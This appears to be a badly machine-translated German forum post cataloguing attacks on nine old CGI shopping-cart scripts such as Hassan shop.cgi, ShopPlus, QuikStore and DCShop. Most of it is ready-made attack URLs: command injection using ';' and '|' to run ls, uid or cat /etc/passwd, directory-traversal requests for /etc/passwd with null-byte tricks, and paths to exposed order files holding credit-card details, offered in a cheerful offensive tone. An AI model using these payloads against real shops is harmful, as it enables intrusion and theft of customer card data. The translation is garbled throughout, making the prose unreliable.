Schwachstellen-Marktplätze

Wir setzen unsere Untersuchung von Fehlern in der jüngsten Vergangenheit, beliebte Einkaufswagen.
Dieses Mal haben wir zu Beginn des LKW überprüfen wird , die beliebige Befehle ausführen dürfen, und nach, und andere Leckereien.

Nummer 1. werden wir (e) - Shop Online-Shop - System von Webdiscount.net

wird das Skript nicht die Zeichen Förder filtern (;) und peyapa (|):
www.xxx.com/cgi-bin/eshop.pl seite =; ls |?

Nummer 2 Hassan Consulting Shoping cart [shop.cgi] von Hassan Consulting.

das selbe:
www.xxx.com/cgi-local/shop.pl/page= | ls |
www.xxx.com/cgi-local/shop.pl/page=; ls |

leider in den Versionen 4 und höher Hassan Consulting Shoping Warenkorb ist dieser Fehler nicht schon vorhanden, aber es gibt ein weiteres Problem mit der Bitte www.xxx.com/cgi-local/shop.pl~~MD~~aux herauszufinden , welche Version eines Einkaufswagens und einen Weg , um Skript kann.

Nummer 3 ShopPlus Wagen

das gleiche, das Fehlen von Kontrollen an den Eingangs Zeichen:
www.xxx.com/scripts/shopplus.cgi dn = domainname.com & cartId =% cartId% & file =; uid |?
www.xxx.com/scripts/shopplus.cgi dn = domainname.com & cartId =% cartId% & file =; cat% 20 / etc / passwd |?

Nummer 4 Multi-shop 1,06

Stattdessen Vorlagendatei können Sie einen beliebigen Befehl angeben.
www.xxx.com/cgi-bin/mshop2?product_template=;ls|&show_items=1&config_file= picodirect.co.uk_mshop2.conf & user_notebooks = note_envoy

Nummer 5 Webcart von Mountain Network Systems

Ausführen von Remote - Befehlen:
www.xxx.com/cgi-bin/webcart.cgi?CONFIG=moutain&CHANGE=YESNEXTPAGE=;ls|&CODE=PHOLD

Ferner sind andere Schwachstellen gestiegen

Number 6 Dansie Warenkorb 3,04 Multiple Vulnerabilities

Hinzufügen zu Ende bestimmter Variablen und Werte zu http: //target/cgi-bin/cart.pl?
Es erlaubt Remote - Benutzer bestimmte Aktionen auszuführen. "Vars" Anzeigeeinstellungen
Anwendungskonfigurationseinstellungen, die den Benutzernamen und das Passwort verwendet , umfasst
für Kreditkartentransaktionen. Umgebungseinstellungen erhalten werden
unter Verwendung des "env".
Die Zeichenfolge "db" wird die gesamte Datenbank - Datei auflisten , die alle Elemente im Warenkorb enthält.
www.xxx.com/cgi-bin/cart.pl?vars
www.xxx.com/cgi-bin/cart.pl?env
www.xxx.com/cgi-bin/cart.pl?db

Nummer 7 ShopCartCGI v 2.3

der Fehler ermöglicht es einem Remote - Benutzer Dateien auf dem Server anzuzeigen:
www.xxx.com/directory/gotopage.cgi?13686+/../../../../../../../../../../../ .. /../../../../etc/passwd
www.xxx.com/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../. ./../../../../etc/passwd

Nummer 8 QuikStore Warenkorb

Ein entfernter Benutzer kann Dateien auf dem System anzuzeigen:
www.xxx.com/quikstore.cgi?blah&template=../../. ./../../../../../../../etc/passwd%00.html
www.xxx.com/quikstore.cgi?blah&template=../../../../../../../../../../../../etc/ Gastgeber
www.xxx.com/quikstore.cgi?blah&t emplate = .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / usr / bin / id |

Number 9 DCShop Elektronische Einkaufswagen

Viele Bugs:
www.xxx.com/cgi-bin/DCShop/Orders/orders.txt - Informationen über die Kreditkarte in älteren Versionen des Wagens ist seit gesehen.
www.xxx.com/cgi-bin/DCShop/dcshop_admin.cgi?action=view_orders - die alten Ausgaben der Kredit in einigen Versionen.

Ihr Fehler Durito.
_________________
ESSEN SIE DIE REICHEN!